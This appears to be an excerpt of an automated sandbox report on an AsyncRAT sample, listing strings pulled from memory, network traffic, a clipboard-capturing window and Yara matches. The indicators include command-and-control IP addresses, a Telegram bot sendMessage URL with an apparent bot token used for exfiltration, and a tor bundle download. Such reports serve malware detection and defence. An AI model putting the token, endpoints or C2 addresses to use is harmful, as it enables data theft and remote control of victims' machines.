Source: yt7dW9nyJK.exe, 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line?fields=query
Source: tor-real.exe, 00000019.00000002.4520803669.000000006C492000.00000008.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://mingw-w64.sourceforge.net/X
Source: powershell.exe, 00000006.00000002.2111386860.0000000005DBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2150002147.00000000058AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.2139450627.0000000004996000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.2106330524.0000000004EA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2139450627.0000000004996000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: yt7dW9nyJK.exe, 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2106330524.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2139450627.0000000004841000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 0000000B.00000002.2257333436.000000000280B000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2106330524.0000000004EA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2139450627.0000000004996000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000008.00000002.2139450627.0000000004996000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.2114974841.000000000777D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://101.126.19.171:443
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://138.2.92.67:443
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://185.217.98.121:443
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://192.99.196.191:443
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%s
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%sDANGEROU
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://44.228.161.50:443
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000006.00000002.2106330524.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2139450627.0000000004841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBcq
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.tele
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage?chat_id=68783
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relay
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relayCan
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://blog.torproject.org/v2-deprecation-timeline
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://blog.torproject.org/v2-deprecation-timelineCalled
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://bugs.torproject.org/tpo/core/tor/14917.
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://bugs.torproject.org/tpo/core/tor/21155.
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://bugs.torproject.org/tpo/core/tor/8742.
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000008.00000002.2150002147.00000000058AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2150002147.00000000058AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2150002147.00000000058AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://freehaven.net/anonbib/#hs-attack06
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com
Source: powershell.exe, 00000008.00000002.2139450627.0000000004996000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip
Source: powershell.exe, 00000006.00000002.2111386860.0000000005DBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2150002147.00000000058AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://objects.githubusercontent.com
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/146779096/943f13f9-3eb9
Source: tor-real.exe, 00000019.00000003.2480126236.0000000000F99000.00000004.00000020.00020000.00000000.sdmp, tor-real.exe, 00000019.00000003.2480334593.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, tor-real.exe, 00000019.00000003.2465033062.0000000003B53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sabotage.net
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004169000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4541756048.0000000004161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004169000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4541756048.0000000004161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.torproject.org/
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.torproject.org/docs/faq.html#BestOSForRelay
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.torproject.org/documentation.html
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.torproject.org/download/download#warning
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.torproject.org/download/download#warningalphabetaThis

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 199.188.200.89:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2

Creates a window with clipboard capturing capabilities

Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe

Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.yt7dW9nyJK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

Process Stats: CPU usage > 49%

Detected potential crypto function

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Code function: 0_2_00B5E2CC	0_2_00B5E2CC
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Code function: 4_2_02A94010	4_2_02A94010
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Code function: 4_2_02A98100	4_2_02A98100
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Code function: 4_2_02A9CB0E	4_2_02A9CB0E
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Code function: 4_2_02A939F8	4_2_02A939F8
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Code function: 4_2_02A989D0	4_2_02A989D0
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Code function: 4_2_02A90FC8	4_2_02A90FC8
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Code function: 4_2_02A97DB8	4_2_02A97DB8
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Code function: 4_2_06573F08	4_2_06573F08
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Code function: 4_2_065718B0	4_2_065718B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_033AB490	6_2_033AB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_02EFB490	8_2_02EFB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_02EFB470	8_2_02EFB470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_087B3E98	8_2_087B3E98
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_0274E2CC	11_2_0274E2CC
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA730D	11_2_04CA730D
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA71DD	11_2_04CA71DD
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA71BD	11_2_04CA71BD
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA02C8	11_2_04CA02C8
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA02D8	11_2_04CA02D8
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA72E5	11_2_04CA72E5
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA739D	11_2_04CA739D
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA73AD	11_2_04CA73AD
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CAEB90	11_2_04CAEB90
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_052CE2CC	19_2_052CE2CC
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_052C74A7	19_2_052C74A7
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_06290D20	19_2_06290D20
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_06290D0F	19_2_06290D0F
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09672941	19_2_09672941
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09675148	19_2_09675148
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09673157	19_2_09673157
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09674118	19_2_09674118
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_096759B0	19_2_096759B0
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09670040	19_2_09670040
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_0967B0E8	19_2_0967B0E8
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09679BE0	19_2_09679BE0
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09677530	19_2_09677530
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_096784C0	19_2_096784C0
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09679798	19_2_09679798
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09679E80	19_2_09679E80
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09678968	19_2_09678968
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_0967513B	19_2_0967513B
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_096759A0	19_2_096759A0
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_0967904C	19_2_0967904C
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09679058	19_2_09679058
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09670012	19_2_09670012
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09679BD0	19_2_09679BD0
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_0967AAE9	19_2_0967AAE9
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09674540	19_2_09674540
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09677520	19_2_09677520
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_096784B0	19_2_096784B0
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_096737A8	19_2_096737A8
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09673799	19_2_09673799
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09679E70	19_2_09679E70
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 22_2_0290E2CC	22_2_0290E2CC
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C074080	25_2_6C074080
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C061D20	25_2_6C061D20
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C061D33	25_2_6C061D33
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C062142	25_2_6C062142
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C06B998	25_2_6C06B998
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0751E0	25_2_6C0751E0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C063A50	25_2_6C063A50
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C069660	25_2_6C069660
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C06C72B	25_2_6C06C72B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C06EB40	25_2_6C06EB40
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C062F63	25_2_6C062F63
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09EC83	25_2_6C09EC83
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BAD60	25_2_6C0BAD60
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09E838	25_2_6C09E838
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CEA50	25_2_6C0CEA50
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09EAA0	25_2_6C09EAA0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0EEB20	25_2_6C0EEB20
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09EB43	25_2_6C09EB43
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DA647	25_2_6C0DA647
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09E040	25_2_6C09E040
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09C260	25_2_6C09C260
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E3CE0	25_2_6C0E3CE0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09B912	25_2_6C09B912
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E5960	25_2_6C0E5960
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A9984	25_2_6C0A9984
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0ED9C0	25_2_6C0ED9C0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DFAA2	25_2_6C0DFAA2
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09B037	25_2_6C09B037
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A9280	25_2_6C0A9280
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1FACF0	25_2_6C1FACF0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C344D30	25_2_6C344D30
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1DCD9D	25_2_6C1DCD9D
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1ACD80	25_2_6C1ACD80
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C192DA0	25_2_6C192DA0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C184E02	25_2_6C184E02
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C184E4B	25_2_6C184E4B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1DEE40	25_2_6C1DEE40
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C184E81	25_2_6C184E81
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C184ECC	25_2_6C184ECC
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1CEEE0	25_2_6C1CEEE0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C184F37	25_2_6C184F37
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1CEF70	25_2_6C1CEF70
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1FCF70	25_2_6C1FCF70
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1ECF90	25_2_6C1ECF90
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C2AAF80	25_2_6C2AAF80
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1CEFAB	25_2_6C1CEFAB
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1F0FE0	25_2_6C1F0FE0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1F8830	25_2_6C1F8830
